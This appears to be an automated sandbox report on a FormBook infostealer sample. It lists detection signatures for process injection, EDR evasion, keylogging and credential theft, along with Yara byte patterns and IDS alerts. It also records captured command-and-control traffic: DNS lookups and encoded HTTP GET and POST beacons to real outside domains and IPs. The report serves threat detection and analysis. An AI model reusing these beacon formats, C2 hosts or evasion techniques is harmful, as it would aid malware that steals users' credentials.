Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Certificate 11-21AIS.exe

Overview

General Information

Sample name:Certificate 11-21AIS.exe
Analysis ID:1560696
MD5:8b68068b577b39f51dee9c3703ac8999
SHA1:bbfb3d4e750b119d142791bcd2c9cd174ea5f364
SHA256:14b355ad5cf22181635d1c97b75288d9d3668aabd57558863ef1e795561274c7
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Certificate 11-21AIS.exe (PID: 1900 cmdline: "C:\Users\user\Desktop\Certificate 11-21AIS.exe" MD5: 8B68068B577B39F51DEE9C3703AC8999)
    • svchost.exe (PID: 4320 cmdline: "C:\Users\user\Desktop\Certificate 11-21AIS.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • YpYSxBPTXgWuOtxBGIerqOSW.exe (PID: 3400 cmdline: "C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 2872 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • YpYSxBPTXgWuOtxBGIerqOSW.exe (PID: 5436 cmdline: "C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5304 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Certificate 11-21AIS.exe", CommandLine: "C:\Users\user\Desktop\Certificate 11-21AIS.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Certificate 11-21AIS.exe", ParentImage: C:\Users\user\Desktop\Certificate 11-21AIS.exe, ParentProcessId: 1900, ParentProcessName: Certificate 11-21AIS.exe, ProcessCommandLine: "C:\Users\user\Desktop\Certificate 11-21AIS.exe", ProcessId: 4320, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Certificate 11-21AIS.exe", CommandLine: "C:\Users\user\Desktop\Certificate 11-21AIS.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Certificate 11-21AIS.exe", ParentImage: C:\Users\user\Desktop\Certificate 11-21AIS.exe, ParentProcessId: 1900, ParentProcessName: Certificate 11-21AIS.exe, ProcessCommandLine: "C:\Users\user\Desktop\Certificate 11-21AIS.exe", ProcessId: 4320, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-22T07:49:29.052437+010020507451Malware Command and Control Activity Detected192.168.2.449736154.215.72.11080TCP
            2024-11-22T07:50:03.299040+010020507451Malware Command and Control Activity Detected192.168.2.449752116.50.37.24480TCP
            2024-11-22T07:51:26.987114+010020507451Malware Command and Control Activity Detected192.168.2.44980585.159.66.9380TCP
            2024-11-22T07:51:42.053332+010020507451Malware Command and Control Activity Detected192.168.2.44997491.195.240.9480TCP
            2024-11-22T07:52:05.483779+010020507451Malware Command and Control Activity Detected192.168.2.45001966.29.149.4680TCP
            2024-11-22T07:52:20.826825+010020507451Malware Command and Control Activity Detected192.168.2.450023195.110.124.13380TCP
            2024-11-22T07:52:52.599727+010020507451Malware Command and Control Activity Detected192.168.2.450027217.196.55.20280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.elettrosistemista.zip/fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.rssnewscast.com/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=Avira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.rssnewscast.com/fo8o/?Ml18S=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&nVb4=q2L0IduHqXQ8JBmpAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: Certificate 11-21AIS.exeReversingLabs: Detection: 60%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4143880613.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4146974677.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4144988043.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4144911596.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1824475216.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Certificate 11-21AIS.exeJoe Sandbox ML: detected
            Source: Certificate 11-21AIS.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000002.4144260794.000000000098E000.00000002.00000001.01000000.00000004.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000000.1892574732.000000000098E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Certificate 11-21AIS.exe, 00000000.00000003.1686506113.0000000003850000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-21AIS.exe, 00000000.00000003.1687615785.0000000003700000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823927375.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823927375.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1734120490.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1735560481.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1823543961.0000000003223000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4145384785.000000000371E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4145384785.0000000003580000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1826364865.00000000033D2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Certificate 11-21AIS.exe, 00000000.00000003.1686506113.0000000003850000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-21AIS.exe, 00000000.00000003.1687615785.0000000003700000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1823927375.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823927375.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1734120490.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1735560481.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000003.00000003.1823543961.0000000003223000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4145384785.000000000371E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4145384785.0000000003580000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1826364865.00000000033D2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000003.1790454232.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823610810.0000000003000000.00000004.00000020.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000003.1760491789.000000000080C000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000003.00000002.4145972280.0000000003BAC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4143985977.000000000307E000.00000004.00000020.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.000000000343C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2118473608.000000002492C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000003.00000002.4145972280.0000000003BAC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4143985977.000000000307E000.00000004.00000020.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.000000000343C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2118473608.000000002492C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000003.1790454232.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823610810.0000000003000000.00000004.00000020.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000003.1760491789.000000000080C000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00906CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00906CA9
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_009060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009060DD
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_009063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009063F9
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0090EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0090EB60
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0090F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0090F5FA
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0090F56F FindFirstFileW,FindClose,0_2_0090F56F
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00911B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00911B2F
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00911C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00911C8A
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00911F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00911F94
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BBBAB0 FindFirstFileW,FindNextFileW,FindClose,3_2_02BBBAB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax3_2_02BA9480
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi3_2_02BADD45
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h3_2_033C053E

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49752 -> 116.50.37.244:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 154.215.72.110:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49805 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49974 -> 91.195.240.94:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50019 -> 66.29.149.46:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50027 -> 217.196.55.202:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50023 -> 195.110.124.133:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.joyesi.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox ViewIP Address: 154.215.72.110 154.215.72.110
            Source: Joe Sandbox ViewIP Address: 195.110.124.133 195.110.124.133
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00914EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00914EB5
            Source: global trafficHTTP traffic detected: GET /fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ml18S=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&nVb4=q2L0IduHqXQ8JBmp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ml18S=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&nVb4=q2L0IduHqXQ8JBmp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ml18S=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&nVb4=q2L0IduHqXQ8JBmp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
            Source: global trafficDNS traffic detected: DNS query: www.k9vyp11no3.cfd
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 202Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 4d 6c 31 38 53 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 64 4c 4e 69 4b 4e 35 6c 6e 6e 59 57 6a 72 30 50 55 51 69 66 77 72 76 4a 78 5a 5a 4d 4e 6d 50 57 67 3d 3d Data Ascii: 